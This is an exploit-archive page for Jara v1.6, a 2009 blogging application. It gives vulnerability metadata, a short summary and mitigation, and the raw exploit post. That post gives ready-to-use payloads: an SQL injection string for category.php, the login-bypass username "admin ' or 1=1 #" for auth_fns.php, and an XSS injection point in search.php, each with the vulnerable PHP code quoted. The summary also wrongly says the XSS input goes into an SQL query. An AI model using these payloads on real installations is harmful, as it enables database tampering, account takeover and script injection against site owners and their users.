Jara v1.6 Multiple Vulnerabilities

vendor:

Jara

by:

Or4nG.M4n

8.8

CVSS

HIGH

SQL Injection, Authentication Bypass, Cross Site Scripting

89, 287, 79

CWE

Product Name: Jara

Affected Version From: v1.6

Affected Version To: v1.6

Patch Exists: NO

Related CWE: N/A

CPE: a:jara:jara:1.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: My Mind (:)

2009

Jara v1.6 Multiple Vulnerabilities

The Jara v1.6 application is vulnerable to SQL Injection, Authentication Bypass and Cross Site Scripting. The SQL Injection vulnerability exists in the category.php file, where user-supplied input is not properly sanitized before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The Authentication Bypass vulnerability exists in the auth_fns.php file, where user-supplied input is not properly sanitized before being used in an SQL query. This can be exploited to bypass authentication by entering ' or 1=1 # as the username. The Cross Site Scripting vulnerability exists in the search.php file, where user-supplied input is not properly sanitized before being used in an SQL query. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries. Authentication should be done using a secure authentication mechanism. Input validation should be used to ensure that untrusted data is not used to dynamically construct HTML output.

Source

Exploit-DB raw data:

#!/Mohammed/bin/YahYa
# Jara v1.6 Multiple Vulnerabilities 
# -------------------------------------------[+]
# download : http://sourceforge.net/projects/jara/files/v1.6/jarav16.zip
# AutHOr   : Or4nG.M4n
# cOntAct  :  priv8te[at]hotmail.com
# versiOn  : v1.6
# Tested   : My Mind (:
# -------------------------------------------[+]
#
[ Exploit ] Sql injection ~ ~
|=> /category.php?id=999999.9'[Here]
# Vulnerable code : category.php
#		@$categoryid = $_REQUEST["id"]; <= [1]
#		$category = jara_get_category($categoryid); <=[2]
#		jara_page_start("Category: ".$category["title"]); <=[3]
#		$query = "select * from jara_posts where categoryid = '$categoryid'"; <=[4]
#		$result = jara_db_query($query); <=[5]
#
[ Exploit ] Auth Bypass ~
|=> admin ' or 1=1 # 
# Vulnerable code : auth_fns.php
#	    function jara_user_authenticate($username, $password) { <=[1]
#		$query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1"; <=[2]
#		$result = jara_db_query($query); <=[3]
#
[ Exploit ] Cross Site Scrpting ~
|=> POST : <h1>DDD<h1> => your xss Code
# Vulnerable code : search.php
#			$num_rows = $result->num_rows;
#			echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";
# ~ End
# -------------------------------------------[+]
#  Greet : sA^Dev!L , xSs m4n , Tryag Team 
# Cyb3r-Crystal , Dr.Banned [Miss u] , i-hmx
# -------------------------------------------[+]